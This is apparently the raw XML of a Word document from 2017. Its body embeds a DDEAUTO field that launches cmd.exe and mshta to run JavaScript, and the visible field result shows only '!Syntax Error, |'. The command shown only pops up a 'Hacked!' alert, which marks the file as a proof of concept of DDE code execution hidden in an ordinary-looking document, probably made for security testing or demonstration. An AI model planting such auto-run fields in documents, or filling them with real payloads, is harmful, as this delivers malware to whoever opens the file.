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63421" w:rsidRDefault="004F5714">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00363421" w:rsidRPr="00363421">
        <w:instrText>DDEAUTO c:\\windows\\system32\\cmd.exe "/c mshta javascript:alert('Hacked!');close();"</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t>!Syntax Error, |</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p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Default="00363421" w:rsidP="00363421"/>
    <w:p w:rsidR="004F5714" w:rsidRPr="00363421" w:rsidRDefault="00363421" w:rsidP="00363421">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7320"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="004F5714" w:rsidRPr="00363421">
      <w:pgSz w:w="11907" w:h="16840"/>
      <w:pgMar w:top="3175" w:right="1701" w:bottom="2155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81" w:rsidRDefault="00C61C81">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00C61C81" w:rsidRDefault="00C6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81" w:rsidRDefault="00C61C81">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00C61C81" w:rsidRDefault="00C6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49E2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D1A5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4"/>
    <w:rsid w:val="002F1091"/>
    <w:rsid w:val="00363421"/>
    <w:rsid w:val="004552C5"/>
    <w:rsid w:val="004C2A70"/>
    <w:rsid w:val="004C6064"/>
    <w:rsid w:val="004F5714"/>
    <w:rsid w:val="005962A6"/>
    <w:rsid w:val="00603C7F"/>
    <w:rsid w:val="00657DDD"/>
    <w:rsid w:val="00666948"/>
    <w:rsid w:val="00822760"/>
    <w:rsid w:val="00B0663F"/>
    <w:rsid w:val="00B23B56"/>
    <w:rsid w:val="00B9798D"/>
    <w:rsid w:val="00C61C81"/>
    <w:rsid w:val="00D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7D649-AA44-40E6-9145-A83D4454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tLeast"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Heading2"/>
    <w:next w:val="BodyText"/>
    <w:qFormat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pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="BodyText"/>
    <w:next w:val="BodyText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30" w:after="13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ListBullet"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="4"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="PageNumber">
    <w:name w:val="page number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Signature">
    <w:name w:val="Signature"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal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4F5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>KPMG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danielteixeira</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>danielteixeira</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-11-15T11:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-15T11:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>